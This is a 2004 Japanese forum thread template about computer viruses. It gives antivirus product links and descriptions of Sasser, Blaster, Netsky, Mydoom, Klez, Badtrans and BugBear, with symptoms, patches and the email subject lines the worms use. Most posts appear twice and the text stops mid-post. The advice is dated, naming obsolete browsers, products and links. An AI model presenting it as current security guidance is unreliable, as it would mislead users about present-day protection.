コンピュータウィルス総合スレッド VOL.39
1 :■■ウィルス関連の質問・相談はこのスレッドでどうぞ■■:
※質問の前に、必ず >>1-13 かミラーサイト( http://pcqa.tripod.co.jp/virus.htm )を読んで下さい。
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
※他の場所から誘導された場合は、その旨書き添える事。(マルチポストとの区別)
★IPAセキュリティセンター http://www.ipa.go.jp/security/index.html
など、ウィルス情報を扱っているWebサイトを見て、ウィルスに関する理解を深めて下さい。
「ホームページが変なページ設定され元に戻らない」
「何もしていなくても、小さなウィンドウに変なページが表示される」
これらはウィルスではなくスパイウェアが原因の場合が多いです。
このPC初心者板の「エロサイト見てたら…助けてください」
というスレッドを検索して、そちらを読んでください。
>>2 オンラインスキャン・体験版
>>3 ウィルス定義ファイル・ワクチンメーカーリンク
>>4 最近よく見られるウィルス
>>5 ウィルスに感染しないために
>>6 Sasser に関する情報
>>7 Blaster & Welchia に関する情報
>8 Netsky / MyDoom に関する情報
>9 Klez に関する情報
>10 Badtrans.B に関する情報
>11 BugBear に関する情報
>12 Nimda に関する情報
>13 Madoka & Ozawa に関する情報
>14-15 過去ログ
前スレ コンピュータウィルス総合スレッド VOL.38
http://pc6.2ch.net/test/read.cgi/pcqa/1087156598/
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
※他の場所から誘導された場合は、その旨書き添える事。(マルチポストとの区別)
★IPAセキュリティセンター http://www.ipa.go.jp/security/index.html
など、ウィルス情報を扱っているWebサイトを見て、ウィルスに関する理解を深めて下さい。
「ホームページが変なページ設定され元に戻らない」
「何もしていなくても、小さなウィンドウに変なページが表示される」
これらはウィルスではなくスパイウェアが原因の場合が多いです。
このPC初心者板の「エロサイト見てたら…助けてください」
というスレッドを検索して、そちらを読んでください。
>>2 オンラインスキャン・体験版
>>3 ウィルス定義ファイル・ワクチンメーカーリンク
>>4 最近よく見られるウィルス
>>5 ウィルスに感染しないために
>>6 Sasser に関する情報
>>7 Blaster & Welchia に関する情報
>8 Netsky / MyDoom に関する情報
>9 Klez に関する情報
>10 Badtrans.B に関する情報
>11 BugBear に関する情報
>12 Nimda に関する情報
>13 Madoka & Ozawa に関する情報
>14-15 過去ログ
前スレ コンピュータウィルス総合スレッド VOL.38
http://pc6.2ch.net/test/read.cgi/pcqa/1087156598/
|
|
|
2 :■■今すぐウィルススキャンを実行してみよう■■:04/07/10 00:10 ID:???
★ウィルス対策ソフトを導入していない人へ・・・
今すぐパソコンショップへ行って買ってきましょう!ウィルスバスター2002やNorton AntiVirusなら、
たいていのお店で売っているはずです。そして、今すぐ買うお金が無い人や、もう感染してるかもし
れないと思っている人はオンラインスキャンを実行してみましょう!でもオンラインスキャンは完璧
じゃないので製品版を買わなきゃダメですよ!買うお金が無いならプロバイダを解約して貯金!
・トレンドマイクロ/オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
オンラインでウィルススキャンが実行できます。ActiveXを利用しますので設定を確認してください。
※Internet Exprolerを使用してください
・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください
・ウイルスバスター評価版ダウンロード
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/trial.htm
(2002体験版 http://www.trendmicro.co.jp/product/vb2002/lis.asp )
・シマンテック/Norton AntiVirus体験版ダウンロード
http://www.symantec.com/region/jp/trial/index.html
★ウィルス対策ソフトを導入してる人へ
ウィルス対策ソフトを導入していたとしても、時々はシステム全体をスキャンしてみましょう。
気が付かないうちに感染していることもあるかもしれません。定期的なウィルススキャンを心懸けましょう。
時間がかかるので、寝ている間にスキャンさせておくと朝には終わってると思います。
※もちろんウィルスの定義ファイル更新も忘れないでください。これが一番【重要】です!
今すぐパソコンショップへ行って買ってきましょう!ウィルスバスター2002やNorton AntiVirusなら、
たいていのお店で売っているはずです。そして、今すぐ買うお金が無い人や、もう感染してるかもし
れないと思っている人はオンラインスキャンを実行してみましょう!でもオンラインスキャンは完璧
じゃないので製品版を買わなきゃダメですよ!買うお金が無いならプロバイダを解約して貯金!
・トレンドマイクロ/オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
オンラインでウィルススキャンが実行できます。ActiveXを利用しますので設定を確認してください。
※Internet Exprolerを使用してください
・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください
・ウイルスバスター評価版ダウンロード
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/trial.htm
(2002体験版 http://www.trendmicro.co.jp/product/vb2002/lis.asp )
・シマンテック/Norton AntiVirus体験版ダウンロード
http://www.symantec.com/region/jp/trial/index.html
★ウィルス対策ソフトを導入してる人へ
ウィルス対策ソフトを導入していたとしても、時々はシステム全体をスキャンしてみましょう。
気が付かないうちに感染していることもあるかもしれません。定期的なウィルススキャンを心懸けましょう。
時間がかかるので、寝ている間にスキャンさせておくと朝には終わってると思います。
※もちろんウィルスの定義ファイル更新も忘れないでください。これが一番【重要】です!
3 :■■ウィルス定義データは定期的に更新しよう■■:04/07/10 00:10 ID:???
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
★McAfee VirusScanはWindowsシステムに悪影響を及ぼすことがあるため、使用しない方がいいです★
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
★McAfee VirusScanはWindowsシステムに悪影響を及ぼすことがあるため、使用しない方がいいです★
4 :■■最近よくみられるウィルスに関して■■:04/07/10 00:11 ID:???
怪しい添付ファイルは絶対に実行(ダブルクリック)せずに、速やかに削除を。
★W32/Sasserに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/sasser.html
★W32/Netskyに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/netsky-b.html
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
★W32/Mydoomに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
★W32/Bagleに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bagle.html
★W32/MSBlasterに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/msblaster.html
★W32/Welchiaに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/welchi.html
★W32/Bugbearに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
★W32/Klezに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/klez.html
★W32/Badtransに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
Outlookはメールを開いただけで、OutlookExpressではプレビューしただけでウィルスに感染します。
★W32/Hybrisに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/hybris.html
★Code Redに関する情報@Microsoft
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/codefaq.asp
※これら以外にも、大変多くのウィルスが存在しています。感染しないように注意すると共に、
ウィルス監視ソフトなどで常にガードしておくことが重要です。
★W32/Sasserに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/sasser.html
★W32/Netskyに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/netsky-b.html
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
★W32/Mydoomに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
★W32/Bagleに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bagle.html
★W32/MSBlasterに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/msblaster.html
★W32/Welchiaに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/welchi.html
★W32/Bugbearに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
★W32/Klezに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/klez.html
★W32/Badtransに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
Outlookはメールを開いただけで、OutlookExpressではプレビューしただけでウィルスに感染します。
★W32/Hybrisに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/hybris.html
★Code Redに関する情報@Microsoft
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/codefaq.asp
※これら以外にも、大変多くのウィルスが存在しています。感染しないように注意すると共に、
ウィルス監視ソフトなどで常にガードしておくことが重要です。
5 :■■ウィルスに感染しないために■■:04/07/10 00:11 ID:???
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
6 :W32.Sasser.Wormとその亜種にご注意!!:04/07/10 00:12 ID:???
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
7 :コンピュータウィルス総合スレッド:04/07/10 00:13 ID:???
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
8 :コンピュータウィルス総合スレッド:04/07/10 00:13 ID:???
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
9 :「W32/Klez」に関する情報:04/07/10 00:13 ID:???
W32/Klezウイルスは、Internet Explorerの既知のセキュリティホールを悪用したウイルスで、
メールの添付ファイルを介して感染を拡げます。このウイルスが添付されたメールを受け取ると、
Outlookではメールを開いただけで、OutlookExpressではプレビューしただけで感染します。
また、亜種も多く発見されています。IPAへは2002年4月〜8月の5ヶ月連続で1000件以上の届け出がありました。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する。
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●説明
このウイルスに感染すると、Outlookのアドレス帳に登録されている全てのアドレス宛に
ウイルスを添付したメールを送信します。送信者のアドレス欄には、ウイルスが作成した架空のアドレスが、
Klezウイルスの亜種の場合はウイルスが収集したメールアドレスの中から1つ選んで記載されます。
●駆除と修復
このウイルスに感染してしまった場合は、レジストリ等の修正が必要となります。
修復用ツールがワクチンベンダーから配布されているので、自己責任で使うと良いでしょう。
●関連リンク
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h%40mm.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
http://www.trendmicro.co.jp/klez/
メールの添付ファイルを介して感染を拡げます。このウイルスが添付されたメールを受け取ると、
Outlookではメールを開いただけで、OutlookExpressではプレビューしただけで感染します。
また、亜種も多く発見されています。IPAへは2002年4月〜8月の5ヶ月連続で1000件以上の届け出がありました。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する。
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●説明
このウイルスに感染すると、Outlookのアドレス帳に登録されている全てのアドレス宛に
ウイルスを添付したメールを送信します。送信者のアドレス欄には、ウイルスが作成した架空のアドレスが、
Klezウイルスの亜種の場合はウイルスが収集したメールアドレスの中から1つ選んで記載されます。
●駆除と修復
このウイルスに感染してしまった場合は、レジストリ等の修正が必要となります。
修復用ツールがワクチンベンダーから配布されているので、自己責任で使うと良いでしょう。
●関連リンク
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h%40mm.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
http://www.trendmicro.co.jp/klez/
10 :「BADTRANS.B」に関する情報:04/07/10 00:14 ID:???
2001年末より「BADTRANS.B」が猛威を奮っています。
このウィルスはInternet Explorerのセキュリティホールを悪用しており、
Outlookでメールを開いたりOutlook Expressでメールをプレビューさせた
だけで自動的に実行され、感染します。
●予防策
★ブラウザ(Internet Explorer)にパッチを適用する。
InternetExplorer 5.01の場合、SP2を適用する。
InternetExplorer 5.5の場合、SP2を適用する。
Internet Explorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●説明
このウィルスに感染すると、受信トレイの未読メールに返信する形で自分自身を添付してメールを
送信したり、Temporary Internet Filesなどにある.asp、.htm、.htmlファイルなどからメールアドレス
を取得して自身を添付してメールを送信します。ウィルス自身に送信機能があるため、メーラーの
送信履歴などには残りません。また同時にキーボード操作を記録するプログラムを投入して、
ウィルス作者にパスワード等の操作記録を送信しようとします。
●駆除と修復
感染してしまった場合、最新のウィルス定義ファイルでスキャンして検出されたファイルを削除し、
レジストリ等を修正する必要があります。駆除ツールを使う場合は自己責任で利用してください。
●関連サイト
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM%5FBADTRANS%2EB
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
駆除ツール
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
このウィルスはInternet Explorerのセキュリティホールを悪用しており、
Outlookでメールを開いたりOutlook Expressでメールをプレビューさせた
だけで自動的に実行され、感染します。
●予防策
★ブラウザ(Internet Explorer)にパッチを適用する。
InternetExplorer 5.01の場合、SP2を適用する。
InternetExplorer 5.5の場合、SP2を適用する。
Internet Explorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●説明
このウィルスに感染すると、受信トレイの未読メールに返信する形で自分自身を添付してメールを
送信したり、Temporary Internet Filesなどにある.asp、.htm、.htmlファイルなどからメールアドレス
を取得して自身を添付してメールを送信します。ウィルス自身に送信機能があるため、メーラーの
送信履歴などには残りません。また同時にキーボード操作を記録するプログラムを投入して、
ウィルス作者にパスワード等の操作記録を送信しようとします。
●駆除と修復
感染してしまった場合、最新のウィルス定義ファイルでスキャンして検出されたファイルを削除し、
レジストリ等を修正する必要があります。駆除ツールを使う場合は自己責任で利用してください。
●関連サイト
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM%5FBADTRANS%2EB
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
駆除ツール
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
11 :「BugBear」に関する情報:04/07/10 00:14 ID:???
Bugbear(W32/BugBear-A, W32/BugBear@mm, Tanatos)ワームが猛威を振るっています。このウ
イルスは
トロイの木馬型で、自分自身のコピーをメールに添付して拡大します。感染すると受信トレイ・送信ト
レイ・その他のファイルからメールアドレスを収集し、取得できた全てのアドレスに対してウイルスを
送信します。さらに共有されているネットワークプリンタに対してもウイルスを送信するため、環境に
よってはウイルスの活動のたびに不可解な文字列の羅列が印刷される症状が現れます。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
★外部からの137と138ポートの通信をファイアウォールで遮断し、
ネットワーク内部のNetBios 名前解決(ブラウジング)の異常増加を監視する
●下記サイトにも情報が掲載されているので、参照して下さい。
W32/Bugbear
http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BUGBEAR.A
修復ツール
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
http://www.nai.com/japan/virusinfo/stinger.asp
●備考
感染するとバックドアが用意され、感染パソコンのキーボード入力履歴が作られます。そのため悪意の
あるウイルス作者?に侵入されたりパスワードを盗まれたりします。感染してしまった場合は駆除した
あとにパスワード類を全て変更してください。
イルスは
トロイの木馬型で、自分自身のコピーをメールに添付して拡大します。感染すると受信トレイ・送信ト
レイ・その他のファイルからメールアドレスを収集し、取得できた全てのアドレスに対してウイルスを
送信します。さらに共有されているネットワークプリンタに対してもウイルスを送信するため、環境に
よってはウイルスの活動のたびに不可解な文字列の羅列が印刷される症状が現れます。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
★外部からの137と138ポートの通信をファイアウォールで遮断し、
ネットワーク内部のNetBios 名前解決(ブラウジング)の異常増加を監視する
●下記サイトにも情報が掲載されているので、参照して下さい。
W32/Bugbear
http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BUGBEAR.A
修復ツール
